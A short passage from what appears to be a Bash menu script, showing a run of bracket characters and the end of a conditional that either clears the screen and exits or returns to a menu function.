]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then menu fi